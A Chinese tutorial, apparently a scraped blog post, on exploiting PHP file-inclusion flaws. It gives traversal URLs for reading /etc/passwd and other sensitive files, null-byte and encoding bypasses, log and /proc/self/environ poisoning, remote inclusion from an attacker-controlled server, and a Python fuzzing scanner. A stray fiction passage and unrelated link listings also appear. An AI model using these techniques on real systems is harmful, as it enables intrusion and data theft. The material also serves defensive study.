渗透测试之文件包含[汇总]
title: 文件包含[汇总]
copyright: true
top: 0
date: 2018-08-08 09:27:45
tags: 文件包含漏洞
categories: 渗透测试
permalink:
password:
keywords:
description: 文件包含漏洞
他沿着墙壁漫步,手指扫过满是灰尘的灶台;打开冰箱,里面只剩下一纸盒过期的酸奶。窗帘很没,是白色的蕾丝纱帘和深青色的绒帘,住在这样屋子里的人当然会很在意窗帘吧?连台电视都没有,于是一个人的时候会常常坐在床上看着夕阳落下吧?夜深的时候得把窗户遮得严严实实的吧?否则……会害怕吧?
漏洞原理
文件包含就是一个文件里面包含另外一个文件,这么说吧,比如在Python中的import其他的包,PHP中inclued其他的文件,因为过程中过滤不严格导致包含漏洞的产生,这种文件调用的过程一般被称为文件包含漏洞。
由于这种灵活性,从而导致客户端可以调用一个恶意文件,传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入,造成文件包含漏洞。
主要在PHP中产生比较多,本文详细介绍PHP的包含漏洞
PHP中包含其他文件的函数有这些,在做代码审计需要用到和记住
include() //当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。
include_once() //功能和 include() 相同,区别在于当重复调用同一文件时,程序只调用一次。
require()//只要程序一执行就会立即调用文件,发生错误的时候会输出错误信息,并且终止脚本的运行
require_once()//的功能与 require() 相同,区别在于当重复调用同一文件时,程序只调用一次。
fopen()//打开指定的某个文件
readfile()//读取指定的文件
关于PHP的常见函数在之前的笔记有提及,可以回顾复习。地址
php 内核并不在意该被包含的文件是什么类型。所以如果被包含的是 txt 文件、图片文件、远程 url、也都将作为 PHP 代码执行。这一特性,在实施攻击时非常有用。
漏洞利用条件:
1. include 等函数通过动态执行变量的方式引入需要包含的文件;
2. 用户能控制该动态变量。
漏洞分类:
文件包含漏洞可以分为 RFI (远程文件包含)和 LFI(本地文件包含漏洞)两种。而区分他们最简单的方法就是 php.ini 中是否开启了allow_url_include。如果开启 了我们就有可能包含远程文件。
1. 本地文件包含 LFI(Local File Include)
2. 远程文件包含 RFI(Remote File Include)(需要 php.ini 中 allow_url_include=on、allow_url_fopen = On)
在 php.ini 中,allow_url_fopen 默认一直是 On,而 allow_url_include 从 php5.2 之后就默认为 Off,一般来说远程文件(包括本地文件包含)包含比本地文件包含的危害大。
漏洞利用
本地包含漏洞案例(LFI)
新建一个phpinfo.txt,然后新建一个shell.php,写入:
访问shell.php会输出phpinfo页面内容,无论将扩展名改为什么,都将以php代码执行。如果文件不是符合php规则的(即没有写等),则通过include可以直接输出源码。
本地包含漏洞利用
读取敏感信息
比如:
http://www.xxx.com/index.php?page=/etc/passwd
Windows:
c:\boot.ini
c:\windows\systems32\inetsrv\MetaBase.xml
c:\windows\repair\sam
c:\windows\php.ini php配置文件
c:\windows\my.ini mysql配置文件
LINUX:
/etc/passwd
/usr/local/app/apache2/conf/http.conf
/usr/local/app/php5/lib/php.ini PHP相关设置
/etc/httpd/conf/http.conf apache配置文件
/etc/my.cnf mysql配置文件
目录遍历
比如:
http://www.xxx.com/index.php?page=./../../test.txt
./ 当前目录 ../ 上一级目录,这样的遍历目录来读取文件
文件上传拿shell
上传一个图片木马a.jpg,内容为:
")?>
访问URL:
http://www.xxx.com/index.php?page=./a.jpg在本地生成shell.php。
配合apache日志拿shell
apache日志分为access.log与error.log,当我们请求一个url地址时,便会记录在access.log中,但如果访问一个不存在的页面,便会将这个页面写入access.log中。如访问URL:
http://www.xxx.com/
则会将一句话写入到access.log中,但是一般来说,写入到access.log文件中的一句话是被编码的,所以需要抓包绕过,而且利用此漏洞需要知道access.log的地址,不然便没有。默认情况下,日志保存路径在 /var/log/apache2/。
利用条件:需要知道服务器日志的存储路径,且日志文件可读。
提交如下请求,将 payload 插入日志
![渗透测试之文件包含[汇总]_第1张图片](http://img.e-com-net.com/image/info8/8a6d9c31755b4543b0a0c365ad20d6d8.jpg)
可以尝试利用 UA 插入 payload 到日志文件
![渗透测试之文件包含[汇总]_第2张图片](http://img.e-com-net.com/image/info8/a9b0ef67ffcc412eb2c0f19349e87f98.jpg)
默认日志地址:
apache+Linux 日志默认路径
/etc/httpd/logs/access_log
或者
/var/log/httpd/access log
apache+win2003 日志默认路径
D:/xampp/apache/logs/access.log
D:/xampp/apache/logs/error.log
IIS6.0+win2003 默认日志文件
C:/WINDOWS/system32/Logfiles
IIS7.0+win2003 默认日志文件
%SystemDrive%/inetpub/logs/LogFiles
nginx 日志文件在用户安装目录的 logs 目录下
如安装目录为 /usr/local/nginx,则日志目录就是在
/usr/local/nginx/logs
也可通过其配置文件 Nginx.conf,获取到日志的存在路径
/opt/nginx/logs/access.log
web 中间件默认配置地址
apache+linux 默认配置文件
/etc/httpd/conf/httpd.conf
或者
index.php?page=/etc/init.d/httpd
IIS6.0+win2003 配置文件
C:/Windows/system32/inetsrv/metabase.xml
IIS7.0+WIN 配置文件
C:/Windows/System32/inetsrv/config/application/Host.config
利用/proc/self/environ进行包含
利用条件:
1. php 以 cgi 方式运行,这样 environ 才会保持 UA 头。
2. environ 文件存储位置已知,且 environ 文件可读。
proc/self/environ 中会保存 user-agent 头。如果在 user-agent 中插入 php 代码,则 php 代码会被写入到 environ 中。之后再包含它,即可
比如:
http://www.test.com/view.php?page=../../../../proc/self/environ
路径不知道试一试
http://www.test.com/view.php?page=../../../../../../../proc/self/environ
选择 User-Agent 写代码如下:
这是web进程运行时的环境变量,其中有些参数是可以被用户控制的,最常见做法就是在User-Agent中插入一句话。
截断包含
有些开发者为了防止本地包含漏洞,会编写一下代码:
(一)00截断包含
新建1.jpg:
")?>
这样的话比如上传一个1.jpg图片马,则访问
http://www.xxx.com/1.jpg
其实这个时候访问的是1.jgp.php,因为没有这个文件所以报错。这是,可以尝试访问
http://www.xxx.com/1.jpg%00
新建a.txt:
上传我们的 2.txt 文件,请求
http://localhost/test/1.php?a=2.txt%00
即可执行 2.txt 中 phpinfo 的代码
(二)使用长目录截断
?page=././././././././././././././etc/passwd
或者
?page=etc/passwd
或者
?page=../a/etc/passwd/../a/etc/passwd/../a/etc/passwd
或者
?page=../../../../../../../../../var/www/%00
服务器端常常会对于 …/ 等做一些过滤,可以用一些编码来进行绕过。下面这些总结来自《白帽子讲 Web 安全》。
利用 url 编码:
../ -》 %2e%2e%2f -》 ..%2f -》 %2e%2e/
..\ -》 %2e%2e%5c -》 ..%5c -》 %2e%2e\
二次编码:
../ -》 %252e%252e%252f
..\ -》 %252e%252e%255c
在windows下目录最大长度为256字节,linux下为4096字节,其后面超出部分被丢弃。
远程包含漏洞案例
新建php.txt:
新建index.php:
随后访问
http://www.xxxx.com/page=http://www.xxxx.com/php.txt执行结果将输出hello world。
远程包含漏洞利用
远程包含shell
新建test.txt文件,保存在你自己远程服务器上,内容如下:
")?>
如果目标网站存在远程包含漏洞,则可以通过访问:
http://www.xxx1.com/index.php?page=http://www.你的域名.com/test.txt则会在服务器根目录下生产一个shell.php内容为:
利用php协议进行包含
漏洞应用条件:
data: php5.2以后版本
php://input 需要开启allow_url_include
poc:
http://www.xxx.com/index.php?file=data:text/plain,%00
扫描器代码检测
原地址
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 脚本语言本地/远程,文件包含/读取, 文件名截断漏洞FUZZ工具
import re
import urlparse
import urllib
import os
# 此函数会在爬虫扫描过程中调用,为任务派遣函数
def assign(service, arg):
# 只接收链接
if service != "www":
return
# 分析链接,看有没有查询参数
r = urlparse.urlparse(arg)
pairs = urlparse.parse_qsl(r.query)
# 如果参数过多,超过6个,效率起见,放弃此链接
if urlparse.urlparse(arg).query.find('=') == -1 or len(pairs) > 6:
return
# 返回True表始接收任务,arg是要调度器传给audit函数的参数
return True, arg
# 远程文件包含的FUZZ函数
def check_rfi(action, query, k, v, normal_res):
# 要判断两次,第一次,传全参数列表进去,第二次,只FUZZ一个参数,其它参数不传
for i in range(2):
# 网上总结的一组经典列表,以(路径,签名)做列表
paths = [
('../../../../../../../../../../etc/passwd', '/bin/(bash|sh)[^\r\n<>]*[\r\n]'),
('../../../../../../../../../../etc/passwd%00', '/bin/(bash|sh)[^\r\n<>]*[\r\n]'),
('http://cirt.net/rfiinc.txt?', 'phpinfo'),
('c:/boot.ini', '\[boot loader\][^\r\n<>]*[\r\n]'),
]
for inj, fingerprint in paths:
qsl = []
# 第一轮fuzz,完整提交全部参数
if i == 0:
for key, val in query:
# 如果参数key为要fuzz的,替换为路径
val = inj if (key==k) else val
qsl.append((key, val))
else:
# 第二轮fuzz, 只提交要fuzz的参数,其它不提交
qsl.append((k, inj))
# 经合成URL
qs = urllib.urlencode(qsl)
url = '%s?%s' % (action, qs)
# 发送请求
code, head, res, _, _ = curl.curl(url)
debug('[%03d] %s', code, url)
# 开始查询是否包含签名内容, 如<?php <%
# 如果指定的签名在fuzz过程中找到,而没有在正常的网页里找到,说明漏洞存在
if re.search(fingerprint, res) and (not re.search(fingerprint, normal_res)):
# 记录一个报告
security_warning(url)
# 中断fuzz
return True
# 本地文件包含的fuzz函数
def check_lfi(action, query, k, v, files, suffix, flags):
filter = {}
# 默认情况下,只测试两轮,像远程文件包含一样
loop = 2
# 如果参数有文件后缀,测试三轮,第三轮测试文件后缀截断漏洞(附加%00)
if suffix:
loop = 3
# 开始fuzz
for i in range(loop):
for file in files:
# 如果是第三轮,循环以0开头(0,1,2), 在后缀后加上\x00测试是否有文件名截断漏洞
if i == 2:
file += '\x00.' + suffix
# 构造查询结构
qsl = []
# 第一轮,提交全部参数
if i == 0:
for key, val in query:
val = file if (key==k) else val
qsl.append((key, val))
# 第二轮,只提交FUZZ的参数
else:
# next loop only test one argments
qsl.append((k, file))
# 构造URL
qs = urllib.urlencode(qsl)
url = '%s?%s' % (action, qs)
# 这里加了一个过滤器,防止产生重复的URL
if url not in filter:
filter[url] = True
# 请求URL
code, head, res, _, new_url = curl.curl(url)
debug('[%03d] %s', code, url)
# 开始查询是否包含签名内容, 如<?php <%
for w in flags:
if re.search(w, res):
# 发现漏洞,上传报告,并返回
security_warning(url)
return True
def audit(arg):
# arg为assign传过来的链接,为一个带参数查询的URL
url = arg
r = urlparse.urlparse(url)
# 取出?号前面的地址
action = urlparse.urlunsplit((r.scheme, r.netloc, r.path, '', ''))
# 取出参数的key
pairs = urlparse.parse_qsl(r.query)
# 以下参数,为.NET的内置参数,自动跳过,不判断
reject_key = ['__VIEWSTATE', 'IbtnEnter.x', 'IbtnEnter.y']
# 请求action, 保存一个返回内容的快照到normal_res
code, head, normal_res, _, _ = curl.curl(action)
# 尝试每个参数是否有远程文件包含漏洞
for k, v in pairs:
# 跳过指定的内置参数
if k in reject_key:
continue
# 如果发现参数有漏洞,返回
if check_rfi(action, pairs, k, v, normal_res):
return
# 尝试每个参数是否有本地文件包含读取漏洞, 以当前文件名做为包含文件,传递
# 获取当前URL的快照,搜索内容来获取有效的用来判断是否利用成功的签名,如:<?php, <%
code, head, res, _, _ = curl.curl(url)
flags = []
for w in ['<\?[\r\n\s=]', '<\?php[\r\n\s=]', '<%[\r\n\s@]']:
if not re.search(w, res):
flags.append(w)
# 没有找到可以使用的签名,返回
if not flags:
return
paths = ['.', '..', '../..', '../../..', '../../../..', '../../../../..']
files = []
# 获取URL的文件名
filename = r.path.split('/')[-1]
# 保存到要fuzz的文件列表里
files.append(filename)
# 保存一组递归目录列表,如./a.php, ../a.php, ../../a.php
for path in paths:
files.append(path + '/' + filename)
# 保存一组递归的完整文件列表如, /../news/show.php, /../../news/show.php
for path in paths:
files.append(path + r.path)
# 开始遍历参数进行fuzz
for k, v in pairs:
# 跳过内置的参数
if k in reject_key:
continue
# 如果参数值里面找到类似a.jpg这样文件名特征, 获取文件后缀到suffix里面去
suffix = ''
if v.find('.') != -1:
suffix = v.split('.')[-1]
# 开始fuzz本地文件包含漏洞
if check_lfi(action, pairs, k, v, set(files), suffix, flags):
return
# 测试代码开始
if __name__ == '__main__':
# 调入SDK模拟环境
from dummy import *
# 模拟调试器传入参数,测试审计函数
audit(assign('www', 'http://demo.webravor.com/kj.jsp?url=lionsky.txt')[1])
</code></pre>
<p>欢迎关注公众号:【安全研发】获取更多相关工具,课程,资料分享哦~<br> <a href="http://img.e-com-net.com/image/info8/865d5e8fbf4947c79654ccbac201821f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/865d5e8fbf4947c79654ccbac201821f.jpg" alt="渗透测试之文件包含[汇总]_第3张图片" width="258" height="258" style="border:1px solid black;"></a></p>
</div>
</div>
</div>
</div>
</div>
<!--PC和WAP自适应版-->
<div id="SOHUCS" sid="1396604585732263936"></div>
<script type="text/javascript" src="/views/front/js/chanyan.js"></script>
<!-- 文章页-底部 动态广告位 -->
<div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
</div>
<div class="col-md-3">
<div class="row" id="ad">
<!-- 文章页-右侧1 动态广告位 -->
<div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
<div class="youdao-fixed-ad" id="detail_ad_1"> </div>
</div>
<!-- 文章页-右侧2 动态广告位 -->
<div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
<div class="youdao-fixed-ad" id="detail_ad_2"></div>
</div>
<!-- 文章页-右侧3 动态广告位 -->
<div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
<div class="youdao-fixed-ad" id="detail_ad_3"></div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="container">
<h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(安全工具,渗透演练,渗透测试,文件包含)</h4>
<div id="paradigm-article-related">
<div class="recommend-post mb30">
<ul class="widget-links">
<li><a href="/article/1835357347615174656.htm"
title="【Death Note】网吧战神之7天爆肝渗透测试死亡笔记_sqlmap在默认情况下除了使用 char() 函数防止出现单引号" target="_blank">【Death Note】网吧战神之7天爆肝渗透测试死亡笔记_sqlmap在默认情况下除了使用 char() 函数防止出现单引号</a>
<span class="text-muted">2401_84561374</span>
<a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
<div>网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!特殊服务端口2181zookeeper服务未授权访问</div>
</li>
<li><a href="/article/1835355667586707456.htm"
title="安全演练有保障,专项督查促改进——记公道中学校园安全(化学实验)系列活动" target="_blank">安全演练有保障,专项督查促改进——记公道中学校园安全(化学实验)系列活动</a>
<span class="text-muted">公中盛传云</span>
<div>近期,公道中学为了全面贯彻落实“预防为主,安全第一,综合治理”的安全工作方针,学校按照安全工作方针的要求,通过多种途径开展了以“预防演练为主,人防物防技防相结合”的主题的安全教育系列活动。11月8日,在学校校务会议上,学校党总支书记李兆兵强调,学校必须采取有力措施,不断增强教师综治安全防范意识,落实学校安全工作责任制,切实保障教师和学生的安全坚决杜绝意外事故的发生,确保校园平安稳定、教育教学工作顺</div>
</li>
<li><a href="/article/1835250784242069504.htm"
title="系统做计划" target="_blank">系统做计划</a>
<span class="text-muted">承谦</span>
<div>过去一年钻研学习时间管理技巧,虽然有一定改善,但相对来说还是应了那句老话:明白了许多道理,依然过不好这一生。为什么过不好这一生?因为没有通过实践变成自己内心演练!就好像那些每天做采购的人,没有因此变成设备生产专家。术业有专攻,虽然看着是同行,差距有时千里之外,至少从学校学科分列时就已经注定了。那要如何办呢?每天去做最重要的事情就是真谛之一!每个人有大量的事情需要处理,但如何集中精力解决最重要的问题</div>
</li>
<li><a href="/article/1835240738338729984.htm"
title="校园高手传(九十)拼命鸡三郎" target="_blank">校园高手传(九十)拼命鸡三郎</a>
<span class="text-muted">紫光极星雨</span>
<div>第九十章拼命鸡三郎鸡妖小火趁着高约七十来米的白色巨大身影,随龙星冲出洞穴之际,展开翅膀,跃入了漆黑不见底的洞穴之中…“哇!这么黑吗?”才进入雷钢鼠栖息的洞穴,小火就察觉到一丝不对劲,四周似乎是有些黑得异常。“吸~”深深吸了一口空气里传来的铁屑和氮肥气息,小火不禁偏过头,把小巧的脑袋迈入翅膀之间,想要借此回避迎面而来的难闻气味,可奈何这股味道太过于浓厚,几乎已经渗透入这座洞穴的每个角落,根本挥之不去</div>
</li>
<li><a href="/article/1835236525449768960.htm"
title="2024年Presto【基础 01】简介+架构+数据源+数据模型(2),2024年最新一线互联网公司面经总结" target="_blank">2024年Presto【基础 01】简介+架构+数据源+数据模型(2),2024年最新一线互联网公司面经总结</a>
<span class="text-muted">2401_84264536</span>
<a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a>
<div>学习路线:这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以点击这里获取一个人可以走的很快,但一群人才能走的更远!不</div>
</li>
<li><a href="/article/1835108554307104768.htm"
title="神兽将归笼" target="_blank">神兽将归笼</a>
<span class="text-muted">边城涛哥</span>
<div>昨晚,一家三口端坐于电脑前,认认真真地参加了学校组织的家长会。这次家长会,就是学生返校前的一次卫生安全防护知识的大宣讲和再动员,校方简要地介绍了前期为准备开学所做的各种演练,也详细地讲解了需要家长和学生高度重视的每一个环节:从如何正确洗手,到上学、就餐时的行进线路;从每天的体温监测,到期末考试的安排等等。明天,学校将组织学生进行核酸检测。我家离学校远,明天得早些出发,听说最近进城的车特多,早上经常</div>
</li>
<li><a href="/article/1835090255145955328.htm"
title="渗透测试的了解" target="_blank">渗透测试的了解</a>
<span class="text-muted">锅盖'awa'</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%B0%8F%E7%99%BD%E4%B9%8B%E8%B7%AF/1.htm">网络安全小白之路</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%80%A7%E6%B5%8B%E8%AF%95/1.htm">安全性测试</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
<div>文章目录概述一、渗透测试分类1.黑盒测试/外部测试2.白盒测试/内部测试3.灰盒测试/组合测试二、渗透测试-目标分类1、主机操作系统渗透2、数据库系统渗透3、应用系统渗透4、网络设备渗透三、渗透测试过程(七个阶段)1.前期交互阶段(Pre-EngagementInteraction)2.情报搜集阶段(InformationGathering)3.威胁建模阶段(ThreatModeling)4.漏洞</div>
</li>
<li><a href="/article/1834990334468255744.htm"
title="身处职场洪流,如何做真正厉害的人" target="_blank">身处职场洪流,如何做真正厉害的人</a>
<span class="text-muted">馨宝1025</span>
<div>每个人脱离学生时代,以后的人生便几乎都是和职场打交道了。职场如战场。如果说学校是人类最后一方净土,那职场则就是渗透着功利、复杂的人际关系的一个风诡云谲的疆场。我们不但要做好本职工作,还要练就十八般武艺,来应对纷繁复杂的职场,使自己立于不败之地。首先是学习的重要性。读书的时候,有时候会很苦恼,觉得读书有什么用。特别是上了大学,面对专业课,如果你不是发自兴趣和内心真正的喜欢,会觉得深奥难懂,枯燥无味,</div>
</li>
<li><a href="/article/1834934669418786816.htm"
title="网络安全测评技术与标准" target="_blank">网络安全测评技术与标准</a>
<span class="text-muted">坚持可信</span>
<a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
<div>网络安全测评是评估信息系统、网络和应用程序的安全性,以发现潜在的漏洞和威胁,并确保系统符合安全标准和政策的过程。以下是常见的网络安全测评类型:1.渗透测试(PenetrationTesting)描述:通过模拟真实的攻击,评估系统、网络和应用程序的安全性,识别和修复漏洞。目标:发现系统中的安全漏洞,评估其可能被利用的风险。方法:黑盒测试:测试人员没有系统内部信息,模拟外部攻击者。白盒测试:测试人员拥</div>
</li>
<li><a href="/article/1834869224200302592.htm"
title="写出渗透测试信息收集详细流程" target="_blank">写出渗透测试信息收集详细流程</a>
<span class="text-muted">卿酌南烛_b805</span>
<div>一、扫描域名漏洞:域名漏洞扫描工具有AWVS、APPSCAN、Netspark、WebInspect、Nmap、Nessus、天镜、明鉴、WVSS、RSAS等。二、子域名探测:1、dns域传送漏洞2、搜索引擎查找(通过Google、bing、搜索c段)3、通过ssl证书查询网站:https://myssl.com/ssl.html和https://www.chinassl.net/ssltools</div>
</li>
<li><a href="/article/1834818182343389184.htm"
title="[ IDE ] 什么是SDK" target="_blank">[ IDE ] 什么是SDK</a>
<span class="text-muted">ERIC-ZI</span>
<a class="tag" taget="_blank" href="/search/IDE/1.htm">IDE</a><a class="tag" taget="_blank" href="/search/IDE/1.htm">IDE</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E7%8E%AF%E5%A2%83/1.htm">开发环境</a>
<div>一、定义在嵌入式系统开发中,SDK(SoftwareDevelopmentKit,软件开发工具包)是一个综合性的工具集合,它被设计用于帮助开发者更有效地为特定的硬件平台编写软件。嵌入式SDK通常包含一系列的工具、库文件、文档和示例代码,旨在简化开发过程并提高开发效率。二、SDK的主要组成编译器和链接器:这些工具用于将开发者编写的源代码转化为目标硬件可以理解和执行的机器码。库文件:库文件包含了一些预</div>
</li>
<li><a href="/article/1834697545679466496.htm"
title="docker_快速部署flask架构下的web容器" target="_blank">docker_快速部署flask架构下的web容器</a>
<span class="text-muted">打败404</span>
<a class="tag" taget="_blank" href="/search/docker/1.htm">docker</a><a class="tag" taget="_blank" href="/search/flask/1.htm">flask</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a>
<div>保证你的机器上安装了docker并正常启动可参考阿里镜像站dockerflask项目结构如下:my-flask-app/├──Dockerfile├──app.py├──requirements.txt└──config/└──settings.pymy-flask-app/这是你的项目根目录,包含了所有与Flask应用相关的文件和配置。Dockerfile这个文件包含了构建Docker镜像所需的</div>
</li>
<li><a href="/article/1834586877798215680.htm"
title="这6首写月亮的古诗,小学语文必背,推荐给家长,你家孩子会背几首?" target="_blank">这6首写月亮的古诗,小学语文必背,推荐给家长,你家孩子会背几首?</a>
<span class="text-muted">米小柚</span>
<div>这两天人类探月又取得了历史性进步,而且是我们中国人完成的,身为一个中国人,为我们的国家的强大感到由衷的自豪。中国人拍的人类第一张月球背面照说到月亮,我们对它既陌生又熟悉。陌生的是,至今我们还在对它进行探索,以期有朝一日揭开它神秘的面纱。熟悉的是,它渗透存在于我们生活的方方面面。我们通过观察的月亮的阴晴圆缺按照“初一十五”过日子;我们每年的中秋节吃月饼故事赏月;我们的神话,嫦娥奔月、玉兔捣药、吴刚伐</div>
</li>
<li><a href="/article/1834521213418958848.htm"
title="网络安全(黑客)自学" target="_blank">网络安全(黑客)自学</a>
<span class="text-muted">白帽子凯哥</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
<div>一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你是一</div>
</li>
<li><a href="/article/1834514532479889408.htm"
title="网络安全(黑客)——自学2024" target="_blank">网络安全(黑客)——自学2024</a>
<span class="text-muted">白帽子黑客-宝哥</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%A1%AC%E4%BB%B6/1.htm">嵌入式硬件</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E7%89%87%E6%9C%BA/1.htm">单片机</a>
<div>一、什么是网络安全网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、网络安全怎么入门安全并非孤立存在,而是建立在其计算机基础之上的应用技术。</div>
</li>
<li><a href="/article/1834514028500709376.htm"
title="2024网络安全学习路线 非常详细 推荐学习" target="_blank">2024网络安全学习路线 非常详细 推荐学习</a>
<span class="text-muted">白帽黑客-晨哥</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a>
<div>关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊,学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间,光语言都有几门,有些人会倒在学习linux系统及命令的路上,更多的人会倒在学习语言上;2、知识点掌握程度不清楚对于网络安全基础内容,很多人不清楚需要学到什么程度,囫囵吞枣,导致在基础上花费太多时间;看到很多小伙伴,买了HTML,PHP,数据库,计算机</div>
</li>
<li><a href="/article/1834513272959758336.htm"
title="入门网络安全工程师要学习哪些内容" target="_blank">入门网络安全工程师要学习哪些内容</a>
<span class="text-muted">白帽黑客2659</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E5%AE%89%E5%85%A5%E9%97%A8/1.htm">网安入门</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
<div>大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对网络安全工程师还是不了解,不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和渗透测试工程师不一样,如果你想成为安全开发工程师,学的侧重点就和安全运维工程师不一样。网络安全工程师学的东</div>
</li>
<li><a href="/article/1834502311624404992.htm"
title="python绝技运用python成为顶级pdf_python绝技:运用python成为顶级黑客 中文pdf完整版[42MB]..." target="_blank">python绝技运用python成为顶级pdf_python绝技:运用python成为顶级黑客 中文pdf完整版[42MB]...</a>
<span class="text-muted">weixin_39851261</span>
<div>Python是一门常用的编程语言,它不仅上手容易,而且还拥有丰富的支持库。对经常需要针对自己所处的特定场景编写专用工具的黑客、计算机犯罪调查人员、渗透测试师和安全工程师来说,Python的这些特点可以帮助他们又快又好地完成这一任务,以极少的代码量实现所需的功能。Python绝技:运用Python成为顶级黑客结合具体的场景和真实的案例,详述了Python在渗透测试、电子取证、网络流量分析、无线安全、</div>
</li>
<li><a href="/article/1834480306040696832.htm"
title="《大学》课后感" target="_blank">《大学》课后感</a>
<span class="text-muted">闹铃_1025</span>
<div>定静安虑得,静而后能安,安于正道,心安理得,理得才能心安!周全的考虑之后才能有所得,知道自己一定有所得!物有本末事有终始!君子务本,终有所成!成为一个值钱的人才是根本,明了万事万物的道理。真正的成功到底是什么??值得自己考虑!在岗位中如何修炼自己?最基本的就是融入公司文化。如何融入企业文化?文化渗透七话法,价值观比业绩更重要!核心价值观,对人的影响最重要!点点滴滴的小事让员工善念长存,价值观能够持</div>
</li>
<li><a href="/article/1834331153021104128.htm"
title="预售23天" target="_blank">预售23天</a>
<span class="text-muted">d1794b269e74</span>
<div>早会玩游戏(狼人杀)之后有个游戏要求11天,直到平安夜才告诉彼此哦——我是你的守护天使,一件有趣的游戏,据说可以锻炼人的观察能力。但一天下来,我真不知道谁会是守护我的那个人哦。也演练微信聊天,哈哈哈,我竟然如此的会逼单的人,每个小伙伴的点评都帮助了我很多,比如最重要的是学会去倾听!这是个重点工程啊!第二点就是官方语言一定要学会用精准的语言去回答客户,该用白话的时候用白话哦,这点还的重复去学习和练习</div>
</li>
<li><a href="/article/1834320716246380544.htm"
